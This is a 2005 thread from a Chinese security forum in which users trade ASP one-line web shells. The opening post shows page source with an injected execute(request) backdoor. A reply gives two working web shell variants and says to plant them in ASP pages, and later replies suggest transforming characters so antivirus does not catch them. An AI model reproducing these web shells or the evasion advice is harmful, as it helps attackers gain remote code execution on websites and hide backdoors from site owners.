|
![]() | 作者: tutitt [tutitt]
![]() |
登录 |
<tr> <td >6.)香港特警组</td><td ><p align="center"><%execute request("value")%></td><td >58.100.113.107</td><td >2005-10-11 21:21:25</td> </tr> <tr> 网页原代码如上。用客户端上传为什么没有用啊,是asp的网站 |
地主 发表时间: 05-10-12 09:18 |
![]() | 回复: virgoshaka [virgoshaka] ![]() |
登录 |
不需要那么多无效字符吧? 一句话马如: <%If Request("#")<>"" Then Execute(Request("#"))%> 或 <script language="vbscript" runat="server"> if request("#")<>"" then session("lcxMarcos")=request("#") if session("lcxMarcos")<>"" then execute(session("lcxMarcos")) </script> 第一个是海洋2006的,第二个好像是2005的?记不清了。 测试都可以通过,插到asp页面里就可以了。 |
B1层 发表时间: 05-10-30 13:18 |
![]() | 回复: lijingxi [lijingxi] ![]() |
登录 |
这样会被杀!~~~ |
B2层 发表时间: 05-10-31 09:15 |
![]() | 回复: virgoshaka [virgoshaka] ![]() |
登录 |
被杀么就做一下字符变换 主要是插到数据库或asp文件后可能会出问题 比如海洋的木马,经常过了密码验证以后莫名其妙就变空白页了,也不知道为什么。。。 |
B3层 发表时间: 05-10-31 21:55 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号